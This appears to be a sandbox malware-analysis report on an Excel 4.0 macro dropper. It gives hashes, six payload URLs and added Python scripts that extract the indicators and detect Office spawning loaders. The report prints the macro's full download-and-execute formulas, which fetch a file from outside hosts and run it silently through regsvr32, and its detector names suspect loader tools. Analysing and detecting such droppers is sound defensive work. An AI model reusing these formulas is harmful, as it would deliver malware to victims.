General

  • Target

    735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

  • Size

    40KB

  • Sample

    241111-zv3j1avqfv

  • MD5

    a76c65d76c17ef921f0dc53e1a29346e

  • SHA1

    81ebd8e04e101b7deb869b243d2ca8c6e1bf7100

  • SHA256

    735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

  • SHA512

    c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b

  • SSDEEP

    768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://asempaye.com/404/zREXldL8ZfpsEepiC/

https://freesoft18.com/urq/dd1s9WyDLkdM/

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

https://pedroribeiro.work/wp-admin/qOkQQ/

https://hojeemdia.life/detector/klwHgC9eat/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx")
    =RETURN()
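The formula chain above is a plain fallback downloader: each URLDownloadToFileA call returns an HRESULT, failure codes have the high bit set and therefore compare as negative, so every IF('EFALGV'!Dnn<0, ...) guard only tries the next URL when the previous download failed (the guarded cells presumably hold the earlier CALL results; the report does not show cell addresses). The last guard closes the workbook if every download failed, otherwise regsvr32.exe /s registers the dropped ..\dan.ocx. The following script is an added example, not tria.ge code; it parses the formulas exactly as printed in this report (embedded as constructed input) and pulls out the URLs, the drop path, the execution command and the fallback structure so they can feed a blocklist or a hunt.

```python
"""Extract indicators from the XLM 4.0 dropper formulas in this report.

Added example (not tria.ge code). The formula text is copied from the
Attributes section; the regexes assume the CALL()/IF()/EXEC() shapes seen
there and are not a general XLM parser.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed input: the report's formulas, one entry per formula.
XLM_FORMULAS = [
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\\dan.ocx",0,0)',
    '=IF(\'EFALGV\'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\\dan.ocx",0,0))',
    '=IF(\'EFALGV\'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\\dan.ocx",0,0))',
    '=IF(\'EFALGV\'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\\dan.ocx",0,0))',
    '=IF(\'EFALGV\'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\\dan.ocx",0,0))',
    '=IF(\'EFALGV\'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\\dan.ocx",0,0))',
    "=IF('EFALGV'!D20<0,CLOSE(0),)",
    '=EXEC("C:\\Windows\\SysWow64\\regsvr32.exe /s ..\\dan.ocx")',
    "=RETURN()",
]

# CALL("urlmon","URLDownloadToFileA","<types>",<caller>,"<url>","<path>",...)
DOWNLOAD_RE = re.compile(
    r'CALL\("urlmon",\s*"URLDownloadToFileA",\s*"[A-Z]+",\s*\d+,\s*"([^"]+)",\s*"([^"]+)"',
    re.IGNORECASE,
)
# IF('<sheet>'!<cell><0, ...)  guards on a previous call's HRESULT being negative
GUARD_RE = re.compile(r"^=IF\('([^']+)'!([A-Z]+\d+)<0,", re.IGNORECASE)
EXEC_RE = re.compile(r'EXEC\("([^"]+)"\)', re.IGNORECASE)


@dataclass
class DropperConfig:
    urls: list = field(default_factory=list)       # download URLs, in macro order
    drop_paths: set = field(default_factory=set)   # local paths written by the downloads
    exec_cmds: list = field(default_factory=list)  # command lines passed to EXEC()
    guarded: int = 0                               # downloads wrapped in an IF(<cell><0, ...) guard
    closes_on_failure: bool = False                # a guard calls CLOSE() when all downloads failed


def parse_xlm(formulas):
    """Walk the formulas in order and collect the dropper's indicators."""
    cfg = DropperConfig()
    for f in formulas:
        guard = GUARD_RE.match(f)
        dl = DOWNLOAD_RE.search(f)
        if dl:
            cfg.urls.append(dl.group(1))
            cfg.drop_paths.add(dl.group(2))
            if guard:
                cfg.guarded += 1
        if guard and "CLOSE(" in f.upper():
            cfg.closes_on_failure = True
        ex = EXEC_RE.search(f)
        if ex:
            cfg.exec_cmds.append(ex.group(1))
    return cfg


def domains(cfg):
    """Hostnames in first-seen order, ready for a DNS or proxy blocklist."""
    seen = []
    for u in cfg.urls:
        host = urlparse(u).hostname
        if host and host not in seen:
            seen.append(host)
    return seen


def uses_lolbin(cfg):
    """True when the payload is loaded through regsvr32, as this sample does."""
    return any("regsvr32" in c.lower() for c in cfg.exec_cmds)


if __name__ == "__main__":
    c = parse_xlm(XLM_FORMULAS)
    print(f"{len(c.urls)} download URLs, {c.guarded} of them fallback-guarded")
    print("drop path(s):", sorted(c.drop_paths))
    print("exec:", c.exec_cmds)
    print("block:", domains(c))
```

Every URL writes to the same relative path ..\dan.ocx, so the file indicator is a single path relative to Excel's working directory rather than an absolute location; hunts that key on absolute paths under %TEMP% or %APPDATA% will miss it.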

Extracted

Language
xlm4.0

Source            URLs

xlm40.dropper     https://asempaye.com/404/zREXldL8ZfpsEepiC/
xlm40.dropper     https://freesoft18.com/urq/dd1s9WyDLkdM/
xlm40.dropper     https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/
xlm40.dropper     https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/
xlm40.dropper     https://pedroribeiro.work/wp-admin/qOkQQ/
xlm40.dropper     https://hojeemdia.life/detector/klwHgC9eat/

Extracted

Language
xlm4.0

Source            URLs

xlm40.dropper     https://asempaye.com/404/zREXldL8ZfpsEepiC/

Targets

    • Target

      735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

    • Size

      40KB

    • MD5

      a76c65d76c17ef921f0dc53e1a29346e

    • SHA1

      81ebd8e04e101b7deb869b243d2ca8c6e1bf7100

    • SHA256

      735604a4576d93b5aab72a9e990506b1eeb80f7dc44a3320ab33bf0c7b7a3313

    • SHA512

      c72a1604288baaf4723c51dbdcd82b95668aa8d6f5af1260c96c32f3c06216019e2735dff572dba3733755b456be05ae2b7bcc60414f955e43251d148408f64b

    • SSDEEP

      768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
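For this sample the unexpected child is regsvr32.exe, launched by the EXEC() formula with /s and a relative module path. The script below is an added example, not tria.ge's signature logic; it shows the parent/child check a SOC would run over process-creation telemetry. It assumes Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine) and that the macro's EXEC() runs under EXCEL.EXE; all events are constructed, the first one mirroring this report's command line.

```python
"""Detect Office applications spawning script hosts or loaders.

Added example, not tria.ge's rule. Assumptions: telemetry shaped like Sysmon
Event ID 1 (ParentImage, Image, CommandLine) and an Excel parent for the
EXEC() in this sample. All events below are constructed.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and loaders an Office application has no routine reason to launch.
SUSPECT_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                    "cscript.exe", "cmd.exe", "powershell.exe", "certutil.exe"}


@dataclass(frozen=True)
class ProcessCreate:
    parent_image: str
    image: str
    command_line: str


# Constructed events; the first mirrors the EXEC() line in this report.
EVENTS = [
    ProcessCreate(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
                  r"C:\Windows\SysWow64\regsvr32.exe",
                  r"C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx"),
    ProcessCreate(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
                  r"C:\Windows\splwow64.exe",
                  r"C:\Windows\splwow64.exe 12288"),            # print helper, benign
    ProcessCreate(r"C:\Windows\explorer.exe",
                  r"C:\Windows\System32\regsvr32.exe",
                  r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Vendor\ctl.dll"'),
    ProcessCreate(r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE",
                  r"C:\Windows\System32\cmd.exe",
                  r"C:\Windows\System32\cmd.exe /c whoami"),
]


def regsvr32_module(cmdline: str) -> Optional[str]:
    """Last non-switch argument of a regsvr32 command line: the module it registers."""
    # Drop the image itself (possibly quoted), then tokenise respecting quotes.
    body = re.sub(r'^(?:"[^"]*"|\S+)\s*', "", cmdline)
    args = [a.strip('"') for a in re.findall(r'"[^"]*"|\S+', body)]
    modules = [a for a in args if not a.startswith("/")]
    return modules[-1] if modules else None


def assess(ev: ProcessCreate):
    """Reasons this event looks like macro-driven execution; empty means benign."""
    parent = ntpath.basename(ev.parent_image).lower()
    child = ntpath.basename(ev.image).lower()
    reasons = []
    if parent not in OFFICE_PARENTS or child not in SUSPECT_CHILDREN:
        return reasons
    reasons.append(f"{parent} spawned {child}")
    if child == "regsvr32.exe":
        if re.search(r"(?i)(^|\s)/s(\s|$)", ev.command_line):
            reasons.append("silent registration (/s)")
        module = regsvr32_module(ev.command_line)
        # A relative module path (..\dan.ocx here) means the file sits next to
        # wherever Excel's working directory is, not in an installed location.
        if module and not ntpath.isabs(module):
            reasons.append(f"relative module path {module}")
    return reasons


def detect(events):
    """Return (event, reasons) for every event that trips at least one check."""
    return [(ev, r) for ev in events if (r := assess(ev))]


if __name__ == "__main__":
    for ev, reasons in detect(EVENTS):
        print(ev.command_line)
        for r in reasons:
            print("  -", r)
```

The parent check is what carries the signal: regsvr32 /s with an absolute path under Program Files is routine from an installer, and the same command under EXCEL.EXE is not, which is why the explorer.exe event above is ignored while the Excel one collects three reasons.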

MITRE ATT&CK Enterprise v15

Tasks